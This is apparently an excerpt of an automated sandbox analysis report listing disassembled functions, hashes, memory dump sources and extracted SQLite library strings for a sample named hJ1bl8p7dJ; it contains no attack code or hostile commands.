                                                                                                                                                                                      • Opcode ID: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                      • Instruction ID: ce9e14e1ab31c2dc275b92abff08531d2682faffb933472d580a69cff4570ea5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C315032A18B8186EB60CF25F8403AE73A0FBC9758F560135EADD43B68EF78C5458B01
                                                                                                                                                                                      Function 00007FFEEE13A8A0 Relevance: 8.6, Strings: 6, Instructions: 1130COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ?$?$BINARY$Expression tree is too large (maximum depth %d)$auto-index$automatic index on %s(%s)
                                                                                                                                                                                      • API String ID: 0-2778317500
                                                                                                                                                                                      • Opcode ID: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                      • Instruction ID: 0125e1d19149f8b5942a68478d53bfe873b62254ec12e1aedea6c5552daf2741
                                                                                                                                                                                      • Opcode Fuzzy Hash: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC29372A08B8186DB60DF15E480BAD77A5FB84B88F438136DB8E43765EF78D895C701
                                                                                                                                                                                      Function 00007FFEEE1D5810 Relevance: 8.6, Strings: 6, Instructions: 1130COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                                                                                      • API String ID: 0-2646008018
                                                                                                                                                                                      • Opcode ID: 372c448508bd327ddcd881427b2f7c790634e4d86250a6e64fdab9af79e6c5bc
                                                                                                                                                                                      • Instruction ID: 949de8af774c744e198be09f730588511001f6454f2f8f8ee94c1ee3b9adea72
                                                                                                                                                                                      • Opcode Fuzzy Hash: 372c448508bd327ddcd881427b2f7c790634e4d86250a6e64fdab9af79e6c5bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EB28D22E09A4286FB549F65F5503B823A1BF48B85F074136CECE577A5DFBCE4858342
                                                                                                                                                                                      Function 00007FFEEE1D7C20 Relevance: 8.5, Strings: 6, Instructions: 973COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                      • API String ID: 0-968123305
                                                                                                                                                                                      • Opcode ID: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                      • Instruction ID: ec124fb9c554e64b50cb74e07ddb396221d49e0b30e289b12bf0a4354b5ddbe7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                      • Instruction Fuzzy Hash: E9A28E22A09A4285EB54DF25E4543B923A5FB84B89F170536CECE577B4DFBCE881C342
                                                                                                                                                                                      Function 00007FFEEE1A3F88 Relevance: 8.2, Strings: 6, Instructions: 739COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 20c:20e$40f$40f-20a-20d$50f$50f-20a-20d$second
                                                                                                                                                                                      • API String ID: 0-2094803905
                                                                                                                                                                                      • Opcode ID: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                      • Instruction ID: 90f64418401a1c19b0679f36c7a2a2d0ea8523b985cd5cad39c77c9ae3b44622
                                                                                                                                                                                      • Opcode Fuzzy Hash: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE52CD62F2868246E729CF38A4107787795AF95744F178333DA8EB66A4EF7CE4C18701
                                                                                                                                                                                      Function 00007FFEEE14D830 Relevance: 8.2, Strings: 6, Instructions: 738COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                      • API String ID: 0-968123305
                                                                                                                                                                                      • Opcode ID: 77826ee8baa902aea28029eed04d4d989c989b6ef8ccdfc9013cd0740c96d28d
                                                                                                                                                                                      • Instruction ID: 4a46d35cb709233e792d0f69cc05c5f54d773b3fdaca77ded060ae09f6f4f25a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 77826ee8baa902aea28029eed04d4d989c989b6ef8ccdfc9013cd0740c96d28d
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE727C22A0D78285EF659F25B4503B923A5FF84B84F574536CA8E573B5DFBCE8818302
                                                                                                                                                                                      Function 00007FFEEE1D0CB0 Relevance: 8.0, Strings: 6, Instructions: 482COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
                                                                                                                                                                                      • API String ID: 0-3006123741
                                                                                                                                                                                      • Opcode ID: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                      • Instruction ID: 98ec6d64ae2cc17157e4c2528922595a61b6f0d53dfc2f285ae423ba8ac7fc47
                                                                                                                                                                                      • Opcode Fuzzy Hash: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18122B63B0C99641E7554F26A06037D3BA2EB45B86F67413BDEDE432A1CFACD885C702
                                                                                                                                                                                      Function 00007FFEEE155EE0 Relevance: 7.0, Strings: 5, Instructions: 707COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                      • API String ID: 0-3582982771
                                                                                                                                                                                      • Opcode ID: 0213c5050dd1b1dbb9ffa182ace20a381e43c978cc7ec7f476a7697f2b1682cf
                                                                                                                                                                                      • Instruction ID: c19164deda8351d8a80376b244444815163c5da92fab29134de53178ffdf231c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0213c5050dd1b1dbb9ffa182ace20a381e43c978cc7ec7f476a7697f2b1682cf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C62C072A09A4686EB94DF14F49477937A4FF84B84F074536CA8E473A4DFBCE4858382
                                                                                                                                                                                      Function 00007FFEEE15A7A0 Relevance: 6.9, Strings: 5, Instructions: 631COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %d %d %d %d $fts3cursor$illegal first argument to %s$offsets$p
                                                                                                                                                                                      • API String ID: 0-1954512986
                                                                                                                                                                                      • Opcode ID: cc3e61a4da039e3837307ec08c8ff40ed8b815f760ae13c2e6321bf51999c818
                                                                                                                                                                                      • Instruction ID: 728e6bc864bb07399c5f6f0dc93fd18f067e17596965c80e75e153835c2b0676
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc3e61a4da039e3837307ec08c8ff40ed8b815f760ae13c2e6321bf51999c818
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF526A32A08B5686EB148F26F94037963A1FB88B95F134132DADD47774DFBCE8918702
                                                                                                                                                                                      Function 00007FFEEE168570 Relevance: 5.9, Strings: 4, Instructions: 888COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$block$misuse
                                                                                                                                                                                      • API String ID: 0-2158970013
                                                                                                                                                                                      • Opcode ID: 5cf3e30bf7bae32d5e43c45fb08ba50007f33c5f623083ee65a0c7770ed6a44a
                                                                                                                                                                                      • Instruction ID: 63ff7d6a524c4d703f2b8eadb1f75c6aa850a80aee1952713a6a479a8a7c616f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf3e30bf7bae32d5e43c45fb08ba50007f33c5f623083ee65a0c7770ed6a44a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 55920721A09A4786EB649F16F99437967A0FF88B80F174536CA8E43771DFBDE4809702
                                                                                                                                                                                      Function 00007FFEEE1E8F80 Relevance: 5.9, Strings: 3, Instructions: 2119COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s.%s$%s.rowid$5
                                                                                                                                                                                      • API String ID: 0-2959728198
                                                                                                                                                                                      • Opcode ID: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                                                      • Instruction ID: 360c7b6f1a836257eb3aafb98015f8176468e05f4f5af5a2969f9d3d656c1eea
                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C338272A186818AE760CF55E040BBE77A1FB84B84F178136EA8E47779DF79D480CB41
                                                                                                                                                                                      Function 00007FFEEE231540 Relevance: 5.6, Strings: 4, Instructions: 626COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %.4c%s%.16c$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
                                                                                                                                                                                      • API String ID: 0-4294478755
                                                                                                                                                                                      • Opcode ID: b3fc16a77d60ef0b2d62892fbb68617719b85cf2c8c41d0be31f83e68d19e67d
                                                                                                                                                                                      • Instruction ID: f93ed803728aea58581351c897c9ea329be33bd8de52cfaa82a7df229395a387
                                                                                                                                                                                      • Opcode Fuzzy Hash: b3fc16a77d60ef0b2d62892fbb68617719b85cf2c8c41d0be31f83e68d19e67d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 78523926A09A47C1EB559F21A45437823A1FF88F94F1B4532CE9E077B5DFBCE441AB02
                                                                                                                                                                                      Function 00007FFEEE12DCD0 Relevance: 4.8, Strings: 3, Instructions: 1036COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: BBB$f$sqlite\_%
                                                                                                                                                                                      • API String ID: 0-4099593418
                                                                                                                                                                                      • Opcode ID: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                      • Instruction ID: d44ab356b4e612f686f021736cb0c2a948d0f43cefc5a3beb3a92f349aeea135
                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CB26B72608A818ADB60DF15E440BAD7BA0F7C8B84F568236DBCE43768DF79D485CB41
                                                                                                                                                                                      Function 00007FFEEE1C24B0 Relevance: 4.5, Strings: 3, Instructions: 778COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                      • API String ID: 0-2903559916
                                                                                                                                                                                      • Opcode ID: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                                                      • Instruction ID: 8699236af0d323f4971d340a10d00488704531622b1dbe9a88884121bee69cd3
                                                                                                                                                                                      • Opcode Fuzzy Hash: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83728F21A09B6686EA598F16B45137963A1FF88B80F574136DA9D833B4DFBDE490C302
                                                                                                                                                                                      Function 00007FFEEE18B660 Relevance: 4.5, Strings: 3, Instructions: 715COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
